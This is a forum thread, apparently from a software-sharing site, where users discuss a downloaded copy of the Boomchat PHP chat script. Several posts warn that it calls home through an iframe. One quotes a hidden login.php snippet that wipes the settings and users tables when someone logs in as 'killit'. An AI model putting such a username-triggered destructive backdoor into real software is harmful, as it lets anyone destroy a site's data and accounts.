25.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

09-25-2015, 04:37 AM
Post: #41
RE: [GET] Boomchat +Addons [Updated: August 28, 2015]
nice, thanks for sharing
10-09-2015, 09:21 PM
Post: #42
RE: [GET] Boomchat +Addons [Updated: August 28, 2015]
thanks for sharing dude :)
11-06-2015, 01:14 AM
Post: #43
RE: [GET] Boomchat +Addons [Updated: August 28, 2015]
nice share,

thank you

rep given
11-21-2015, 09:28 AM
Post: #44
RE: [GET] Boomchat +Addons [Updated: August 28, 2015]
Anyone have addons Boom stream for Boomchat PHP/AJAX chat or Boom Quiz.

Please share, this awesome addon

Thanks all my friends... Great thread ++Reps
11-21-2015, 11:42 AM
Post: #45
RE: [GET] Boomchat +Addons [Updated: August 28, 2015]
Its not clean, please fix this
[Image: 2e4zy9s.jpg]
Sorry please help me, this script callback and can't be use in my server.
69.gif
11-21-2015, 12:06 PM
Post: #46
RE: [GET] Boomchat +Addons [Updated: August 28, 2015]
(11-21-2015 11:42 AM)ozghelp Wrote:  Its not clean, please fix this
[Image: 2e4zy9s.jpg]
Sorry please help me, this script callback and can't be use in my server.

Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.
:)
11-21-2015, 01:05 PM
Post: #47
RE: [GET] Boomchat +Addons [Updated: August 28, 2015]
(11-21-2015 12:06 PM)sup3rman Wrote:  
(11-21-2015 11:42 AM)ozghelp Wrote:  Its not clean, please fix this
[Image: 2e4zy9s.jpg]
Sorry please help me, this script callback and can't be use in my server.

Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.
yes i install boom_embed, thanks for the advice
11-21-2015, 01:09 PM
Post: #48
RE: [GET] Boomchat +Addons [Updated: August 28, 2015]
(11-21-2015 12:06 PM)sup3rman Wrote:  
(11-21-2015 11:42 AM)ozghelp Wrote:  Its not clean, please fix this
[Image: 2e4zy9s.jpg]
Sorry please help me, this script callback and can't be use in my server.

Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.

not sure, maybe removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"
11-21-2015, 01:46 PM (This post was last modified: 11-21-2015 01:47 PM by sup3rman.)
Post: #49
RE: [GET] Boomchat +Addons [Updated: August 28, 2015]
(11-21-2015 01:05 PM)ozghelp Wrote:  
(11-21-2015 12:06 PM)sup3rman Wrote:  
(11-21-2015 11:42 AM)ozghelp Wrote:  Its not clean, please fix this
[Image: 2e4zy9s.jpg]
Sorry please help me, this script callback and can't be use in my server.

Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.
yes i install boom_embed, thanks for the advice

Addons are clean too. I suggest removing the line i tell after, as I can see they get you installation and backdoor into the script or something like that.

(11-21-2015 01:09 PM)mdarparvez Wrote:  
(11-21-2015 12:06 PM)sup3rman Wrote:  
(11-21-2015 11:42 AM)ozghelp Wrote:  Its not clean, please fix this
[Image: 2e4zy9s.jpg]
Sorry please help me, this script callback and can't be use in my server.

Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.

not sure, maybe removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"

yes or just changing the domain for somehitng else.
:)
11-21-2015, 02:25 PM
Post: #50
RE: [GET] Boomchat +Addons [Updated: August 28, 2015]
(11-21-2015 12:06 PM)sup3rman Wrote:  
(11-21-2015 11:42 AM)ozghelp Wrote:  Its not clean, please fix this
[Image: 2e4zy9s.jpg]
Sorry please help me, this script callback and can't be use in my server.

Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.



just try register new user with this

username: killit

then login as killit

!! the site will destroy

i think the author added bad codes in (login.php)

Code:
if($username == 'killit'){
$mysqli->query("TRUNCATE TABLE  setting");
$mysqli->query("TRUNCATE TABLE  users");
}


and you must remove this folder (rescue)
43.gif




26.gif